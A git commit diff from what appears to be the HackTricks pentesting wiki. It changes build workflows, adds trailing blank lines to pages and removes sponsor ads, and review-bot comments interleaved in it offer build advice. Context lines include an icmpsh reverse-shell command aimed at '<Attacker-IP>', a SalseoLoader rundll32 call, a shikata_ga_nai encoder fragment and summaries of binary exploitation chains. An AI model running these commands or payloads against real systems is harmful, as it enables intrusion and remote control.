translations 4

Carlos Polop 2025-01-02 21:57:43 +01:00
parent fbf2a0779e
commit 61aa4fc5ee
251 changed files with 473 additions and 783 deletions

@ -47,7 +47,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=en mdbook build
# Cat hacktricks-preprocessor.log
#- name: Cat hacktricks-preprocessor.log
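Review bot: the new `run:` line hard-codes `MDBOOK_BOOK__LANGUAGE=en`, while the equivalent hunks in the other workflow files in this commit derive the value from `$BRANCH`. If this file is the workflow for the English branch the constant is intentional, but a one-line comment above the step saying so would spare the next reader from wondering why this workflow differs, and would make it obvious that `en` must be kept in sync with the language keys the `$BRANCH` workflows rely on.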

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
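Review bot: `$BRANCH` is expanded by the step's shell, and nothing in this hunk shows where it is defined, so if the job's `env:` does not set it the variable expands to empty and `mdbook build` silently falls back to the language configured in `book.toml`, producing a wrongly-labelled site instead of a failed job. Consider failing fast, e.g. `run: MDBOOK_BOOK__LANGUAGE="${BRANCH:?BRANCH is not set}" mdbook build`, or passing the value through a step-level `env:` block so its origin is visible next to its use. The identical one-line change is repeated in the sixteen workflow files that follow, so whatever is decided here should be applied to all of them; while touching these files, the unchanged comment `# Login in AWs` has a typo (`AWS`).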

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

@ -29,3 +29,5 @@ icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
```
{{#include ../banners/hacktricks-training.md}}

@ -176,3 +176,5 @@ rundll32.exe SalseoLoader.dll,main
```
{{#include ../banners/hacktricks-training.md}}

@ -11,3 +11,5 @@
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>

@ -1,3 +1,5 @@
# Arbitrary Write 2 Exec

@ -70,3 +70,5 @@ Now a **fast bin attack** is performed:
- [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md).
{{#include ../../banners/hacktricks-training.md}}

@ -87,3 +87,5 @@ The **Full RELRO** protection is meant to protect agains this kind of technique
- [https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook](https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook)
{{#include ../../banners/hacktricks-training.md}}

@ -54,3 +54,5 @@ In order to abuse **`.fini_array`** to get an eternal loop you can [**check what
> In newer versions, even with [**Partial RELRO**] the section **`.fini_array`** is made **read-only** also.
{{#include ../../banners/hacktricks-training.md}}

@ -236,3 +236,5 @@ To abuse this you need either to **leak or erase the `PTR_MANGLE`cookie** and th
You can find an example of this in the [**original blog post about the technique**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#6---code-execution-via-other-mangled-pointers-in-initial-structure).
{{#include ../../banners/hacktricks-training.md}}

@ -16,3 +16,5 @@ However he you can find some nice **examples**:
- 64bits, no relro, canary, nx, no pie. There is an off-by-one in an array in the stack that allows to control a pointer granting WWW (it write the sum of all the numbers of the array in the overwritten address by the of-by-one in the array). The stack is controlled so the GOT `exit` address is overwritten with `pop rdi; ret`, and in the stack is added the address to `main` (looping back to `main`). The a ROP chain to leak the address of put in the GOT using puts is used (`exit` will be called so it will call `pop rdi; ret` therefore executing this chain in the stack). Finally a new ROP chain executing ret2lib is used.
- [https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html)
- 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check).

@ -109,3 +109,5 @@ Something to take into account is that usually **just one exploitation of a vuln
- [**Uninitialized variables**](../stack-overflow/uninitialized-variables.md): You never know
{{#include ../../banners/hacktricks-training.md}}

@ -394,3 +394,5 @@ Each variable will hace an entry in the TLS header specifying the size and the T
The `__TLS_MODULE_BASE` is a symbol used to refer to the base address of the thread local storage and points to the area in memory that contains all the thread-local data of a module.
{{#include ../../banners/hacktricks-training.md}}

@ -239,3 +239,5 @@ Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
![](<../../../images/image (858).png>)
{{#include ../../../banners/hacktricks-training.md}}

@ -174,3 +174,5 @@ pwn update
```
{{#include ../../../banners/hacktricks-training.md}}

@ -33,3 +33,5 @@ gdb /path/to/executable /path/to/core_file
This command loads the executable and the core file into GDB, allowing you to inspect the state of the program at the time of the crash. You can use GDB commands to explore the stack, examine variables, and understand the cause of the crash.
{{#include ../../banners/hacktricks-training.md}}

@ -302,3 +302,5 @@ Note therefore how it might be possible to **bypass ASLR abusing the vdso** if t
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

@ -80,3 +80,5 @@ p.interactive()
- 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. ROP gadget to call puts to leak the address of puts from the GOT and then call an one gadget.
{{#include ../../../banners/hacktricks-training.md}}

@ -31,3 +31,5 @@ Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overf
- [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md)
{{#include ../../../banners/hacktricks-training.md}}

@ -23,3 +23,5 @@ The **shadow stack** is a **dedicated stack used solely for storing return addre
- The **shadow stack**, on the other hand, ensures that even if an attacker can overwrite a return address on the normal stack, the **discrepancy will be detected** when comparing the corrupted address with the secure copy stored in the shadow stack upon returning from a function. If the addresses don't match, the program can terminate or take other security measures, preventing the attack from succeeding.
{{#include ../../banners/hacktricks-training.md}}

@ -82,3 +82,5 @@ Pointer guard is an exploit mitigation technique used in glibc to protect stored
- [https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1](https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1)
{{#include ../../banners/hacktricks-training.md}}

@ -82,3 +82,5 @@ When a **mismatch is detected** the kernel will **panic** to prevent further exp
- [https://www.youtube.com/watch?v=UwMt0e_dC_Q](https://www.youtube.com/watch?v=UwMt0e_dC_Q)
{{#include ../../banners/hacktricks-training.md}}

@ -14,3 +14,5 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter
- **Ret2...**
{{#include ../../banners/hacktricks-training.md}}

@ -30,3 +30,5 @@ bypassing-canary-and-pie.md
- [https://ir0nstone.gitbook.io/notes/types/stack/pie](https://ir0nstone.gitbook.io/notes/types/stack/pie)
{{#include ../../../banners/hacktricks-training.md}}

@ -94,3 +94,5 @@ According to [**some observation from this post**](https://github.com/florianhof
According to that blog post it's recommended to add a short delay between requests to the server is introduced.
{{#include ../../../banners/hacktricks-training.md}}

@ -33,3 +33,5 @@ If Full RELRO is enabled, the only way to bypass it is to find another way that
Note that **LIBC's GOT is usually Partial RELRO**, so it can be modified with an arbitrary write. More information in [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)**.**
{{#include ../../banners/hacktricks-training.md}}

@ -74,3 +74,5 @@ This attack is performed in the writeup: [https://7rocky.github.io/en/ctf/other/
- [https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/](https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/)
{{#include ../../../banners/hacktricks-training.md}}

@ -119,3 +119,5 @@ Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-ca
- [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html)
- 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there.

@ -31,3 +31,5 @@ With an **arbitrary read** like the one provided by format **strings** it might
- This challenge abuses in a very simple way a format string to read the canary from the stack
{{#include ../../../banners/hacktricks-training.md}}

@ -36,3 +36,5 @@ In order to bypass this the **escape character `\x16` must be prepended to any `
**Here you can** [**find an example of this behaviour**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.**
{{#include ../banners/hacktricks-training.md}}

@ -2,11 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
{% embed url="https://www.stmcyber.com/careers" %}
## Basic Information
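Review bot: removing the sponsor figure and its `{% embed url=... %}` line is the right call, since that tag is GitBook templating that the mdBook build (which processes `{{#include ...}}` but not `{% ... %}`) would emit as literal text; however, this hunk and the next one in the same file drop the only two visible references to `../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png`. Please check whether any other page still references that asset and, if not, delete the file in the same commit so the repository does not accumulate orphaned images.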
@ -242,10 +237,7 @@ It's possible to abuse the write actions of a format string vulnerability to **w
- [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html)
- 32 bit, relro, no canary, nx, no pie, format string to write an address inside main in `.fini_array` (so the flow loops back 1 more time) and write the address to `system` in the GOT table pointing to `strlen`. When the flow goes back to main, `strlen` is executed with user input and pointing to `system`, it will execute the passed commands.
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
{% embed url="https://www.stmcyber.com/careers" %}
{{#include ../../banners/hacktricks-training.md}}

@ -182,3 +182,5 @@ p.close()
<figure><img src="broken-reference" alt="" width="563"><figcaption></figcaption></figure>
{{#include ../../banners/hacktricks-training.md}}

@ -143,3 +143,5 @@ P.interactive()
```
{{#include ../../banners/hacktricks-training.md}}

@ -121,3 +121,5 @@ In this example, if a user inputs a negative number, it will be interpreted as a
This **doesn't change in ARM64** as you can see in [**this blog post**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/).
{{#include ../banners/hacktricks-training.md}}

@ -210,3 +210,5 @@ void iosurface_kwrite64(uint64_t addr, uint64_t value) {
With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).

@ -527,3 +527,5 @@ heap-memory-functions/heap-functions-security-checks.md
- [https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/)
- [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/)

@ -638,3 +638,5 @@ heap-memory-functions/heap-functions-security-checks.md
- [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/implementation/tcache/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/implementation/tcache/)
{{#include ../../banners/hacktricks-training.md}}

@ -130,3 +130,5 @@ h1: 0xaaab0f0c2380
- [https://heap-exploitation.dhavalkapil.com/attacks/double_free](https://heap-exploitation.dhavalkapil.com/attacks/double_free)
{{#include ../../banners/hacktricks-training.md}}

@ -151,3 +151,5 @@ unsorted-bin-attack.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

@ -5,3 +5,5 @@
##
{{#include ../../../banners/hacktricks-training.md}}

@ -384,3 +384,5 @@ _int_free_merge_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T size)
</details>
{{#include ../../../banners/hacktricks-training.md}}

@ -161,3 +161,5 @@ free.md
- Error message: `realloc(): invalid next size`
{{#include ../../../banners/hacktricks-training.md}}

@ -1744,3 +1744,5 @@ sysmalloc_mmap (INTERNAL_SIZE_T nb, size_t pagesize, int extra_flags, mstate av)
</details>
{{#include ../../../banners/hacktricks-training.md}}

@ -81,3 +81,5 @@ Heap leaks:
- If P is in the doubly linked list, both `fd` and `bk` will be pointing to an available chunk in the heap
{{#include ../../../banners/hacktricks-training.md}}

@ -48,3 +48,5 @@ python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt
- We corrupt pointers to a function inside a `struct` of the overflowed chunk to set a function such as `system` and get code execution.
{{#include ../../banners/hacktricks-training.md}}

@ -47,3 +47,5 @@
- Use House of Einherjar to get an overlapping chunks situation and finish with Tcache poisoning ti get an arbitrary write primitive.
{{#include ../../banners/hacktricks-training.md}}

@ -62,3 +62,5 @@ Then, do another malloc to get a chunk at the target address.
- Then, House of force was used (abusing the UAF) to overwrite the size of the left space with a -1, allocate a chunk big enough to get tot he free hook, and then allocate another chunk which will contain the free hook. Then, write in the hook the address of `system`, write in a chunk `"/bin/sh"` and finally free the chunk with that string content.
{{#include ../../banners/hacktricks-training.md}}

@ -45,3 +45,5 @@ Then you will be able to allocate `fake0`.
- [https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html)
{{#include ../../banners/hacktricks-training.md}}

@ -73,3 +73,5 @@ This approach exploits heap management mechanisms, libc information leaks, and h
- [https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html)
{{#include ../../banners/hacktricks-training.md}}

@ -109,3 +109,5 @@ The fake chunk becomes part of the fastbin list, making it a legitimate chunk fo
The **House of Rabbit** technique involves either modifying the size of a fast bin chunk to create overlapping chunks or manipulating the `fd` pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills.
{{#include ../../banners/hacktricks-training.md}}

@ -116,3 +116,5 @@ Finally, one the correct address is overwritten, **call `malloc` and trigger the
- [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_roman/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_roman/)
{{#include ../../banners/hacktricks-training.md}}

@ -116,3 +116,5 @@ int main() {
- [https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit)
{{#include ../../banners/hacktricks-training.md}}

@ -56,3 +56,5 @@ You can find another great explanation of this attack in [**guyinatuxedo**](http
- FSOP is needed to finish the exploit.
{{#include ../../banners/hacktricks-training.md}}

@ -113,3 +113,5 @@ This image explains perfectly the attack:
- Finally, a new fast bin chunk of 0x68 is allocated and `__malloc_hook` is overwritten with a `one_gadget` address
{{#include ../../banners/hacktricks-training.md}}

@ -21,3 +21,5 @@ It might be possible to **overflow an allocated chunk having next a freed chunk*
In this case it would be possible to **modify the size** of the following chunk in memory. An attacker could abuse this to **make an allocated chunk have a bigger size**, then **`free`** it, making the chunk been **added to a bin of a different** size (bigger), then allocate the **fake size**, and the attack will have access to a **chunk with a size which is bigger** than it really is, **granting therefore an overlapping chunks situation**, which is exploitable the same way to a **heap overflow** (check previous section).
{{#include ../../banners/hacktricks-training.md}}

@ -45,3 +45,5 @@ Usually it's possible to find at the beginning of the heap a chunk containing th
- **Tcache poisoning** to get an arbitrary write primitive.
{{#include ../../banners/hacktricks-training.md}}

@ -127,3 +127,5 @@ This attack allows to **change a pointer to a chunk to point 3 addresses before
- There is an overflow that allows to control the FD and BK pointers of custom malloc that will be (custom) freed. Moreover, the heap has the exec bit, so it's possible to leak a heap address and point a function from the GOT to a heap chunk with a shellcode to execute.
{{#include ../../banners/hacktricks-training.md}}

@ -71,3 +71,5 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n
- Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`.
{{#include ../../banners/hacktricks-training.md}}

@ -18,3 +18,5 @@ first-fit.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

@ -62,3 +62,5 @@ d = malloc(20); // a
- It's possible to alloc some memory, write the desired value, free it, realloc it and as the previous data is still there, it will treated according the new expected struct in the chunk making possible to set the value ot get the flag.
- [**https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html**](https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html)
- In this case it's needed to write 4 inside an specific chunk which is the first one being allocated (even after force freeing all of them). On each new allocated chunk it's number in the array index is stored. Then, allocate 4 chunks (+ the initialy allocated), the last one will have 4 inside of it, free them and force the reallocation of the first one, which will use the last chunk freed which is the one with 4 inside of it.

@ -193,3 +193,5 @@ rop-syscall-execv/
- arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
{{#include ../../banners/hacktricks-training.md}}

@ -122,3 +122,5 @@ Behaviour signatures to find those functions:
- [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop)
{{#include ../../banners/hacktricks-training.md}}

@ -182,3 +182,5 @@ target.interactive()
Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**.
{{#include ../../banners/hacktricks-training.md}}

@ -195,3 +195,5 @@ target.interactive()
- 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`.
{{#include ../../banners/hacktricks-training.md}}

@ -187,3 +187,5 @@ p.interactive()
- [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp)
{{#include ../../banners/hacktricks-training.md}}

@ -163,3 +163,5 @@ This basically means abusing a **Ret2lib to transform it into a `printf` format
- 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check).
{{#include ../../../banners/hacktricks-training.md}}

@ -35,3 +35,5 @@ angry_gadget.py examples/libc6_2.23-0ubuntu10_amd64.so
```
{{#include ../../../banners/hacktricks-training.md}}

@ -215,3 +215,5 @@ p.interactive()
```
{{#include ../../../banners/hacktricks-training.md}}

@ -302,3 +302,5 @@ BINSH = next(libc.search("/bin/sh")) - 64
```
{{#include ../../../../banners/hacktricks-training.md}}

@ -2,9 +2,6 @@
{{#include ../../../../banners/hacktricks-training.md}}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
```python:template.py
from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools
@ -222,8 +219,7 @@ Try to **subtract 64 bytes to the address of "/bin/sh"**:
BINSH = next(libc.search("/bin/sh")) - 64
```
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
{{#include ../../../../banners/hacktricks-training.md}}

@ -67,3 +67,5 @@ srop-sigreturn-oriented-programming/srop-arm64.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

@ -193,3 +193,5 @@ target.interactive()
- 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there.
{{#include ../../../banners/hacktricks-training.md}}

@ -126,3 +126,5 @@ p.interactive()
```
{{#include ../../../banners/hacktricks-training.md}}

@ -143,3 +143,5 @@ target.interactive()
- SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed.
{{#include ../../../banners/hacktricks-training.md}}

@ -190,3 +190,5 @@ And to bypass the address of `/bin/sh` you could create several env variables po
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

@ -102,3 +102,5 @@ There are several protections trying to prevent the exploitation of vulnerabilit
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

@ -27,3 +27,5 @@ You can find an example in:
- [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting)
{{#include ../../banners/hacktricks-training.md}}

@ -113,3 +113,5 @@ ret2win-arm64.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

@ -187,3 +187,5 @@ p.close()
```
{{#include ../../../banners/hacktricks-training.md}}

@ -234,3 +234,5 @@ Also in the following page you can see the equivalent of **Ret2esp in ARM64**:
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

@ -95,3 +95,5 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w
- arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
{{#include ../../../banners/hacktricks-training.md}}

@ -79,3 +79,5 @@ The only "complicated" thing to find here would be the address in the stack to c
I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real address of the start of the shellcode.
{{#include ../../../banners/hacktricks-training.md}}

@ -66,3 +66,5 @@ int main() {
This doesn't change at all in ARM64 as local variables are also managed in the stack, you can [**check this example**](https://8ksec.io/arm64-reversing-and-exploitation-part-6-exploiting-an-uninitialized-stack-variable-vulnerability/) were this is shown.
{{#include ../../banners/hacktricks-training.md}}

@ -259,3 +259,5 @@ EXITFUNC=thread -e x86/shikata_ga_nai
```
{{#include ../banners/hacktricks-training.md}}

@ -184,3 +184,5 @@ These practices and mechanisms are foundational for anyone looking to engage wit
- [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced_address_reuse)
{{#include ../../banners/hacktricks-training.md}}

Some files were not shown because too many files have changed in this diff.